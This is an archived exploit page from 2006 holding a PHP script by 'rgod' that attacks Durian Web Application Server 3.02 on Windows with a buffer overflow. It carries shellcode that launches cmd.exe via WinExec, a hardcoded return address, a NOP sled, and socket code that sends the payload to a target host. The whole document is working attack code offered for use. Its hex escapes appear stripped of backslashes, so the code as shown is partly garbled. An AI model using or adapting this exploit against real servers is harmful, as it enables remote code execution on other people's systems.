Home / os / solaris

durian-302-exec.txt

Posted on 29 December 2006

<?php /* Durian Web Application Server 3.02 freeware for Win32 buffer overflow execute command exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org tested against xp sp2 ita software site -> http://sourceforge.net/projects/durian/ */ error_reporting(E_ALL); $address = "192.168.1.3"; $service_port = "4002"; $shellcode = "xebx1b". "x5b". "x31xc0". "x50". "x31xc0". "x88x43x59". "x53". "xbbx6dx13x86x7c". //WinExec, 0x7c86136d "xffxd3". "x31xc0". "x50". "xbbxdaxcdx81x7c". //ExitProcess, 0x7c81cdda "xffxd3". "xe8xe0xffxffxff". "x63x6dx64". "x2e". "x65". "x78x65". "x20x2f". "x63x20". "cmd.exe /c start notepad & "; //$eip="x72xe0xf1x00";//DEP disabled $eip="x72xe0xf2x00"; $ch =array("xaa","xa0","x41"); $size=array(30,70,150,330,520,700,1400,2300); for ($j=0; $j<count($ch); $j++){ for ($i=0; $i<count($size); $i++){ $junk=""; if (($j==2) and ($i==7)){ $junk ="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVXXXX"; $junk.="YYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuu"; $junk.=$eip; //jmp shellcode for ($n=1; $n<=100; $n++){ $junk.="x90"; } $junk.=$shellcode; for ($n=1; $n=(2300-strlen($junk)); $n++){ $junk.="x90"; } } else { for ($k=1; $k<=$size[$i]; $k++){ $junk.=$ch[$j]; } } $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket < 0) { die("socket_create() failed: reason: " . socket_strerror($socket) . " "); } $result = socket_connect($socket, $address, $service_port); if ($result < 0) { die("socket_connect() failed: reason: ($result) " . socket_strerror($result) . " "); } $in = $junk; socket_write($socket, $in, strlen ($in)); socket_close($socket); } } ?>

 

TOP